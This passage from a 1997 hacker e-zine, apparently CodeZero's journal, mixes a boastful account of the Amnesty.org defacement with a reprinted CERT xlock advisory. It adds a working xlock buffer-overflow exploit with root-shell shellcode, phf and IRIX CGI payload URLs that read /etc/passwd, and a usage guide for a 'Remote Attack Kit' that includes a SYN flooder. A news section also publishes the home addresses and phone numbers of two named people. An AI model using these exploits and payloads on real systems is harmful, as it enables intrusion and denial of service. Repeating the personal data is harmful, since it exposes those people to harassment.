found in the logs, the fact that this was on the same
day as amnesty is the ONLY factor linking me to these
events :
GET /cgi-bin/phf?qalias=X%0Acat%20/etc/passwd
(I think there's also a "3D" somewhere in there too..)
And here is the phf query code set down by every text
I have ever read AND in phfscan.c which I would use if
I ever wanted to scan such sites for the phf hole :
GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
I think we can all see a slight difference, which basically
says "IT'S NOT MY FUCKING STYLE! ONLY A LUNA-FUCKING-TICK
would even think about using that technique. Seeing it
probably wouldn't work anyway."
The next point is the IP from where the queries originate,
it is *.telia.com which I have been told is a SWEDISH ISP
now, do I live in Sweden? NO!! Do I have any shells at
dynamic IP's IN SWEDEN? NO!! There is no plausible way
I could have run such a scan. Unless I dial long distance,
which isn't gonna happen.
One last point, I knew that we "0wned" amnesty.org from
about 2 weeks before we actually decided to change the
index.html, because when my friends broke in the first
time, they had set up a .rhosts file and a suid root shell
in something like /tmp/.... But when they left the system
and tried to regain access, they found that the admin had
removed the account or changed the login and pass, so we
decided to leave the site for about a week and a half, until
we started to try and formulate a way to get back in, in
this period we did NO phf scanning whatsoever. And on the
weekend when we did get back in, using an ingenious method
that I was never told about, by a new hacker to our team,
modeX, we decided to at least do something to prove we had
regained access, so I designed a new index.html, to which
the team uploaded. That was all that happened, and therefore
the phf scans can IN NO WAY be related to the amnesty.org
attack as we owned that system A LONG TIME before, and it
was only a matter of regaining access, one last point being
that we didn't walk through the amnesty "front door" as it
were, as I was told we stumbled over a trusted host,
shell.oil.ca or something like that.
Anyway, thats just a few points I would like to raise in
proving that sIn are again VERY CL000LESS fucks who know
absolutely NOTHING about hacking or "the scene" in any way
shape or form...And as for the Incident Response Team, they
are most probably looking for some lamefuck Swedish haqr.
Any-Fucking-Way, what the fuck they gonna do when they find
this haqr?!@ arrest him for phf'ing 80 sites? h0h0h0, I wouldn't
call that much of a bust :) "Listen sonny! you're gonna get 10
years for connecting to port 80 and typing "GET /cgi-bin/phf?
Qalias=x%0a/bin/cat%20/etc/passwd" becuase thats not against
ANY law and CERT owns us all.
so1o.
There are alot of missing pieces, and alot of the data I base
my argument on originated from m0dify (see the letter to
IRT@TELIA.NET earlier) so I think I have more of an idea than
Hostile the cl00less lame gimpfuck wannabe haqr.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
7. CERT Advisory CA-97.13 : xlock vunerablity : Taken From Bugtraq
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Topic: Vulnerability in xlock
-------------------------------------------------------------------------------
The CERT Coordination Center has received reports that a buffer overflow
condition exists in some implementations of xlock. This vulnerability makes it
possible for local users (users with access to an account on the system) to
execute arbitrary programs as a privileged user.
Exploitation information involving this vulnerability has been made publicly
available.
If your system is vulnerable, the CERT/CC team recommends installing a
patch from your vendor. If you are not certain whether your system is
vulnerable or if you know that your system is vulnerable and you cannot add a
patch immediately, we urge you to apply the workaround described in
Section III.B.
We will update this advisory as we receive additional information.
Please check our advisory files regularly for updates that relate to your site.
-------------------------------------------------------------------------------
I. Description
xlock is a program that allows a user to "lock" an X terminal. A buffer
overflow condition exists in some implementations of xlock. It is
possible attain unauthorized access to a system by engineering a
particular environment and calling a vulnerable version of xlock that has
setuid or setgid bits set. Information about vulnerable versions must be
obtained from vendors. Some vendor information can be found in Appendix A
of this advisory.
Exploitation information involving this vulnerability has been made
publicly available.
Note that this problem is different from that discussed in CERT Advisory
CA-97.11.libXt.
II. Impact
Local users are able to execute arbitrary programs as a privileged user
without authorization.
III. Solution
Install a patch from your vendor as described in Solution A. If you are
not certain whether your system is vulnerable or if you know that your
system is vulnerable and you cannot install a patch immediately, we
recommend Solution B.
A. Obtain and install a patch for this problem.
Below is a list of vendors who have provided information about
xlock. Details are in Appendix A of this advisory; we will
update the appendix as we receive more information. If your
vendor's name is not on this list, the CERT/CC did not hear from
that vendor. Please contact your vendor directly.
Berkeley Software Design, Inc. (BSDI)
Cray Research - A Silicon Graphics Company
Data General Corporation
Digital Equipment Corporation
FreeBSD, Inc.
Hewlett-Packard Company
IBM Corporation
LINUX
NEC Corporation
The Open Group [This group distributes the publicly available software
that was formerly distributed by X Consortium]
Solbourne
Sun Microsystems, Inc.
B. We recommend the following workaround if you are not certain
whether your system is vulnerable or if you know that your system
is vulnerable and you cannot install a patch immediately.
1. Find and disable any copies of xlock that exist on your system and
that have the setuid or setgid bits set.
2. Install a version of xlock known to be immune to this
vulnerablility. One such supported tool is xlockmore. The latest
version of this tool is 4.02, and you should ensure that this is
the version you are using. This utility can be obtained from the
following site:
ftp://ftp.x.org/contrib/applications/xlockmore-4.02.tar.gz
MD5 (xlockmore-4.02.tar.gz) = c158e6b4b99b3cff4b52b39219dbfe0e
You can also obtain this version from mirror sites. A list of
these sites will be displayed if you are not able to access the
above archive due to load.
...........................................................................
Appendix A - Vendor Information
Below is a list of the vendors who have provided information for this
advisory. We will update this appendix as we receive additional information.
If you do not see your vendor's name, the CERT/CC did not hear from that
vendor. Please contact the vendor directly.
Berkeley Software Design, Inc. (BSDI)
=====================================
BSD/OS is not vulnerable to the problem in xlock since our
xlock is not setuid.
Cray Research - A Silicon Graphics Company
==========================================
Cray Research does not include xlock in its X Window releases, so we are
not at risk on the xlock buffer overflow problem.
Data General Corporation
========================
The xlock sources (xlockmore-3.7) that DG includes in its contributed
software package have been modified to remove this vulnerability. These
will be available when release 8 comes out. We also recommend that our
customers who have the current version should change the sprintf calls in
resource.c to snprintf calls, rebuild and reinstall the package.
Digital Equipment Corporation
=============================
This reported problem is not present for Digital's ULTRIX or
Digital UNIX Operating Systems Software.
FreeBSD, Inc.
=============
The xlockmore version we ship in our ports collection is vulnerable
in all shipped releases. The port in FreeBSD-current is fixed.
Solution is to install the latest xlockmore version (4.02).
Hewlett-Packard Company
=======================
We ship an suid root program vuelock that is based on xlock.
It does have the vulnerability.
The only workaround is to remove the executable, the patch is "in process".
IBM Corporation
===============
AIX is vulnerable to the conditions described in this advisory.
The following APARs will be released soon:
AIX 3.2: APAR IX68189
AIX 4.1: APAR IX68190
AIX 4.2: APAR IX68191
IBM and AIX are registered trademarks of International Business Machines
Corporation.
LINUX
=====
Red Hat:
Not vulnerable
Caldera:
Not vulnerable
Debian:
An updated package is on the Debian site
SuSE:
ftp://ftp.suse.com/pub/SuSE-Linux/suse_update/S.u.S.E.-4.4.1/xap1/xlock
And in general the new Xlockmore release fixes the problems.
NEC Corporation
===============
UX/4800 Not vulnerable for all versions.
EWS-UX/V(Rel4.2MP) Not vulnerable for all versions.
EWS-UX/V(Rel4.2) Not vulnerable for all versions.
UP-UX/V(Rel4.2MP) Not vulnerable for all versions.
The Open Group
==============
Publicly available software that was formerly distributed by the X Consortium -
Not vulnerable.
Solbourne
=========
Solbourne is not vulnerable to this attack.
Sun Microsystems, Inc.
======================
We are producing patches for OpenWindows 3.0 for Sun OS versions
4.1.3_U1, 4.1.4, 5.3, 5.4, 5.5, and 5.5.1.
-------------------------------------------------------------------------------
The CERT Coordination Center thanks David Hedley for reporting the original
problem and Kaleb Keithley at The Open Group for his support in the
development of this advisory.
-------------------------------------------------------------------------------
If you believe that your system has been compromised, contact the CERT
Coordination Center or your representative in the Forum of Incident Response
and Security Teams (see http://www.first.org/team-info/).
CERT/CC Contact Information
------------------------------
Email cert@cert.org
Phone +1 412-268-7090 (24-hour hotline)
CERT personnel answer 8:30-5:00 p.m. EST(GMT-5) / EDT(GMT-4)
and are on call for emergencies during other hours.
Fax +1 412-268-6989
Postal address
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
USA
Using encryption
We strongly urge you to encrypt sensitive information sent by email. We can
support a shared DES key or PGP. Contact the CERT/CC for more information.
Location of CERT PGP key
ftp://info.cert.org/pub/CERT_PGP.key
Getting security information
CERT publications and other security information are available from
http://www.cert.org/
ftp://info.cert.org/pub/
CERT advisories and bulletins are also posted on the USENET newsgroup
comp.security.announce
To be added to our mailing list for advisories and bulletins, send
email to
cert-advisory-request@cert.org
In the subject line, type
SUBSCRIBE your-email-address
-------------------------------------------------------------------------------
* Registered U.S. Patent and Trademark Office.
Copyright 1997 Carnegie Mellon University
This material may be reproduced and distributed without permission provided
it is used for noncommercial purposes and the copyright statement is
included.
The CERT Coordination Center is part of the Software Engineering Institute
(SEI). The SEI is sponsored by the U.S. Department of Defense.
-------------------------------------------------------------------------------
This file: ftp://info.cert.org/pub/cert_advisories/CA-97.13.xlock
http://www.cert.org
click on "CERT Advisories"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Revision history
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBM3DOFnVP+x0t4w7BAQH9MwQAwULlCDTqDbW+CiS0/Z36BtGf6Eqzx43B
pEt72rQlQbw2AqRnHeq85dzVUB4eKmL0T//bGYyo0sCt+8nlFaS3cNYh0cyl3jdu
JPDVoNhWB7v2+8nHvAEDz2UdomNVaxXDFvAbZ9JvEk/Ex6aFiXtl4qXdjxtcC4ze
kGKLcu0+LzE=
=nF5B
-----END PGP SIGNATURE-----
------------------------------------------------------------------------------
The Exploit Code - not in the *ORIGINAL* CERT advisory ;] :
------------------------------------------------------------------------------
/* x86 XLOCK overflow exploit
by cesaro@0wned.org 4/17/97
Original exploit framework - lpr exploit
Usage: make xlock-exploit
xlock-exploit <optional_offset>
Assumptions: xlock is suid root, and installed in /usr/X11/bin
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define DEFAULT_OFFSET 50
#define BUFFER_SIZE 996
long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
int main(int argc, char *argv[])
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
int dfltOFFSET = DEFAULT_OFFSET;
u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/bin/sh";
int i;
if (argc > 1)
dfltOFFSET = atoi(argv[1]);
else printf("You can specify another offset as a parameter if you need...\n");
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i<2;i++)
*(addr_ptr++) = get_esp() + dfltOFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
execl("/usr/X11/bin/xlock", "xlock", "-nolock", "-name", buff, NULL);
}
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
8. IRiX WWW Server Bugs : Tetsu Khan
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Number 1 :
----------
http://www.site.com/cgi-bin/wrap?/etc
...Lets you view the contents of the /etc/ directory, you can try others too..
Number 2 :
----------
http://www.site.com/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
...Lets you view the /etc/passwd file, also try /etc/hosts to make sure the
cgi script isn't a trap. You can also execute some kind of remote shell using
webdist technique, but we are looking into it now...
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
9. Hacking Not-So-Electrical Items : Tetsu Khan
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
y0h CrEw!@# T0daY wE WiLL LeArN tEw Hax0r....
TrEES!!! tReEs!!! TrEEs!!!
TrEES!!! tReEs!!! TrEEs!!!
TrEES!!! tReEs!!! TrEEs!!!
YePpO! TrEEs! LiKe Da oNeZ j00 FiNd In YeR GaRdEn SoMeTiMeS!!
oKaY, HeRe aRe THe k-LEeTo JuaReZ YeW wILL nEEd...
1 : A HaCk SaW
2 : CoMoFlAgUeD CLoThiNG
3 : a CoPPeR NaiL
4 : A hAmmER
5 : a GI-JoE AcTiOn FiGuRe (WiTH pArAChUte)
6 : a SmALL, wELL TrAiNeD InSecT, LiKe A bEE
7 : oNe LaPtOp ComPUtEr (wIv d0S 2.4 *OnLy*)
8 : OnE RS232 CaBlE
OkAy CrEw! ThIs iS Da mAsTA PlAn!@#
FiRsTly, aS WiTH mANy OtHer HaCks YoU WiLL nEEd tO ScAn Da PoRts Of ThE TrEE,
dO ThIs By UsIng tHE SmALL, wELL TrAiNeD InSecT, LiKe A bEE, aS bEE's aRe ThE
BeSt At SCannInG HiDDen PoRtz, WhEn ThE bEE HaS fOuND sOmE kEwL PoRtS (UsuALLy
aT dA tOp oF Da TrEE) tIe ThE GI-JoE AcTiOn FiGuRe tO ThE bEE, aNd gEt HiM To
PuT YeR Rs232 CaBle Up ThErE sO YeW CaN AcCesS dA PoRt Of Da TrEE!
WhEn ThE rS232 cAbLE iS In pLACe, PuT oN ThE CaMofLAUgEd CloTHIng, AnD HiDe
BeHiNd A bUsH WiTh YoUr LaPtOP, ThEn GeT ThE GI-JoE AcTiOn FiGuRe To PaRAcHute
d0Wn dA TrEE, aNd GiVe YoU ThE OTheR EnD Of dA Rs232 CaBLe, ThEn gO InTo DoS
AnD RuN tHiS PrOgRam In Gw-BASiC...
10 OPEN (COM PORT AND STUFF)
20 DATA "GIVE ME ALL YOUR K-LEET JUAREZ AND STUFF NOW, BECAUSE I OWN J00"
30 OPEN (ANOTHER PORT AND STUFF)
40 DATA "EYE BE W00PIN J00 F00L, PHEAR MUH ELEETNESS"
50 GOTO 10
ThIs ShOuLd cRaSh ThE TrEE, LeAvInG iT OpEn tO AtTaCk, NeXt TaKE ThE HaCk SaW
AnD StArT cUtTiNg The BaRK oFF ThE TrEE (OnLy iN oNe pLaCe) ThE BArk AcTs LiKe
a FiRewALL, AnD sO It MuSt Be tAkeN DoWN FirSt.
NeXt CHecK On YoUr LaPtOp WheThEr ThE TrEE HaS GiVen yEw eLeeT JuArEz, iF NoT
ThEN uSe The CoPPeR nAiL to rm -rf / ThE TrEE, HaMmEr The CoPPeR nAiL InTo The
TrEE, AnD ThE TrEE WiLL bE rm'd WitHiN aBOUt A wEEk (dEw TeW 99999999999999 GB
HaRd dRivE SPaCe)
hAvE PhUn! MoRe NoT-So-LeCtiCaL iTeMz NeXt TimE!@~^&*
TeEkAy.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. Amnesty International Hacked : Article From cnet.com
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
http://www.news.com/News/Item/0,4,10135,00.html
Amnesty International hacked
By Janet Kornblum
April 28, 1997, 3:15 p.m. PT
Hackers broke into the Amnesty International home
page over the weekend, altering it with a highly
stylized, futuristic-looking graphic of a small child or
baby smoking a cigarette.
Amnesty International didn't know what the
perpetrators wanted to accomplish with the
hacking, which was strikingly apolitical considering
the political nature of the target. Above the picture,
the altered Web page read, "Who laughs last? We
are the 4 man dream team, just proving one of
many points."
But just what those points were was lost on many,
not the least of whom was Mike Blackstock, the
system administrator for Ontario Internet Link, the
small Canadian Internet service provider that hosts
the Amnesty site for free.
"As far as I can tell, they didn't do anything
malicious," he said. "They replaced one page of
Amnesty with a silly graphic of a kid smoking. This
was not political as far as I could tell. The only
politics I could think of was cigarettes."
Beneath the picture, the page is signed, "Thanx to:
so1o, modeX, XFli, mstrhelix...CodeZero uber
alles!"
This hack appears to be unrelated to other recent
high-profile incidents, including one last week in
which a Portuguese group broke in to Indonesian
government Web pages to protest its treatment of
East Timor. In that case, the hackers--referred to
by many as "crackers" because they crack into
systems--were quite clear about the reasons behind
their action.
In the case of the Amnesty page, Blackstone said
the hackers only altered the Web page and did not
cause major damage, though they could have done
so if they wanted to. The altered page was up for a
few hours, he said.
Blackstone was busy plugging the security hole but
pointed out that sites much bigger with higher
profiles, such as the Air Force, the Central
Intelligence Agency, and the Justice Department,
also have been hacked.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. //sToRm// Of sIn Rips Port Pro : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Ummmm, on www.sinnerz.com //sToRm// has a lamefuck page with his k-leet
w1nd0ze '95 juarez, coded in Visual Basic, with his "VB For Dummies" book,
which include...
DrSpewfy : Pile'O'Crap, why not get a nameserver and sirc? and
actually be able to talk to people?
DCCNewk : Chargen Flood? why not try like, SYN FLOOD? d0h..
Port Pro : Okay, original Port Pro is SHAREWARE, made by Blue Byte
Software, and it is SOOO obvious that //sToRm// just did a
little bit of hex editing, and B00oo00m! hes changed the
authors name and shit to his own! but ummm, because of his
EXTREME lameness, he didn't know how to change the program
name, the version and the general interface and look of the
program, what a LAME FUCK. I'm sure he will have Blue Byte
on his fucking ass with Copyright and shit. h0h0h0h0h0!@#
I doubt //sToRm// coded *ANYTHING* on that page,
as DrSpewfy is just shit, and DCCNewk is just like the DCC
Nuking code we put out in the CodeZero Technical Journal
Issue 2 :)
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
3. Digital Darkness Lives : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
It looked as if the DD wouldn't bring out a magazine this month, but they
got a huge influx of submissions and live another day!@# if you want to submit
anything for DD, mail spamman@erols.com or spaman@erols.com 'cos I ain't shure.
Visit their page too : http://dd.home.ml.org
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
4. /home/sdr 0wned : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
sdr, a user of duncan.nac.net (owned by bspline - where all the cool people on
efnet have their shells) was playing with the permissions in his home directory
and he accidentally made the whole directory world readable, so then cold blood
and others got all of sdr's k-leet y00nix juarez, and tar'd + gz'd them up and
were distributing the sdr.tar.gz in #hack using XDCC :)
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
5. Sendmail 8.8.4 Remote Is Out : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Yep, its been confirmed, the sendmail 884 remote exploit for ALL OS's is now
out, there was some delay in r00t members getting the offsets needed for each
Operating System, but now the technique is complete, and many 8.8.4 systems
are vunerable. Sendmail 8.8.5 remote exploits are being looked into now.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
6. sIn inf0z Part 2 : The CodeZero
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
-------------------------------------------------------------------------------
=-= w0wie!@# we g0t 2 n0w!! =-=
-------------------------------------------------------------------------------
Alias : Evil Chick
Real Name : Suzette Kimminau
Address : 130 105th Ave. S.E. Apt. 218
Bellevue, Wa 98004
USA
Telephone : (206)454-7176
Email : evilchic@NWLINK.COM
-------------------------------------------------------------------------------
Alias : \\StOrM\\
Real Name : Jason Sloderbeck
Address : 5739 N Norton,
Kansas City, MO 64119
USA
Telephone : (816)453-8722
Email : storm@SINNERZ.COM
-------------------------------------------------------------------------------
aS wE PrOMiSeD LasT t1me! eXpect m0re s00n!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\
=/-/=/-/=/-/=/-/=/-/=/-/ so1o of The CodeZero presents. \-\=\-\=\-\=\-\=\-\=\-\=
-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\
=/-/=/-/=/-/=/-/=/-/=/-/ The CodeZero \-\=\-\=\-\=\-\=\-\=\-\=
=/-/=/-/=/-/=/-/=/-/=/-/ Remote Attack Kit. \-\=\-\=\-\=\-\=\-\=\-\=
=/-/=/-/=/-/=/-/=/-/=/-/ [CRAK] \-\=\-\=\-\=\-\=\-\=\-\=
-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\
=/-/=/-/=/-/=/-/=/-/=/-/ .:. -=10/05/97=- .:. \-\=\-\=\-\=\-\=\-\=\-\=
-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
w00 w00!! Now you can have k-leet skills like me! Firstly upload the crak.tar
to a linux 2.0.x system, or to your own, then tar -xvf crack.tar to unzip the
file, then move the files around and shit if you want to, then you're ready
to go! Expect OS specific kits in later issues...And Multi-Scan s00n.
===============================================================================
The Contents Of The Kit :
===============================================================================
dnsscan : Mass DNS query program, gets lists of systems in entire countries,
or all the systems on a network, like *.microsoft.com.
phpscan : Scans hosts from a file and outputs a list of php vunerable sites.
phpget : Gets files from php vunerable servers.
phfscan : Scans hosts from a file and outputs a list of php vunerable sites.
ident-scan: Scans all daemons running on ports and determines cool stuff.
tcpprobe : Very simple portscanner.
fingah : Uses an apache hole to finger systems if port 79 isnt open.
synk4 : SYN flooder, basically kicks the shit out of systems.
===============================================================================
Usages :
===============================================================================
Use this command to unzip the crak.tar...
% tar -xvf crak.tar
then it will be copied into /crak, depending on the working directory..
DNSscan :
---------
Usage: dnscan [-file <filename>] [-domain <domain>] [-sub <subdomain>]
-file Usages <filename> as a list of subdomains and servers to scan.
-domain Lists all servers in a first level domain like com or net.
-subdomain Lists all servers in a domain.
The -domain mode will first create a file called 'domain.<domain>' with a
list of all subdomains and their name servers, and then use that file in
the -file mode.
The input file needs to have the following format:
<domain> <subdomain> [<dns>]
To list all servers in Japan, do "dnscan -domain jp"
To list all servers in the netcom domain, do "dnscan -sub netcom.com"
PHPscan :
---------
phpscan <infile> <outfile>
eg.
phpscan domains.txt phpvunerable.txt
PHPget :
--------
phpget <domain> <path and file>
eg.
phpget www.p1.com /etc/passwd
PHFscan :
---------
phfscan <infile> <outfile>
eg.
phfscan domains.txt phfvunerable.txt
Ident-Scan :
------------
ident-scan <host> [low port] [high port]
eg.
ident-scan warped.arc.nasa.gov 1 9999
TCPprobe :
----------
tcpprobe <host>
eg.
tcpprobe microsoft.com
Fingah :
--------
fingah <domain> <user>
eg.
fingah www.p1.com root
Synk4 :
-------
synk4 <source ip / address> <target host> <low port> <high port>
if you use 0 as the source address, its puts the syn flooder into random
ip mode, where the packets are sent from many different random sites.
eg.
synk4 0 fucked.com 1 23
Have Phun!@#
===============================================================================
Where To Get CRAK.tar : Under CodeZero Linux Tools Section on www.codez.com
===============================================================================
It can be unzipped with WinZip if you are in W1nd0ze too.. :)
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Well, that was issue 2, hope ya'll liked it, don't forget to visit...
AnD ReMeMBer To LiNk To iT FrOm YouR SiTeZ!!
=====================> http://www.codez.com NOW UP!@#* <=====================
=====================> http://www.codez.com NOW UP!@#* <=====================
=====================> http://www.codez.com NOW UP!@#* <=====================
Until next time, when there will be 900 days until the year 2000...
The CodeZero.
===============================================================================
=====================> http://www.codez.com NOW UP!@#* <=====================
===============================================================================
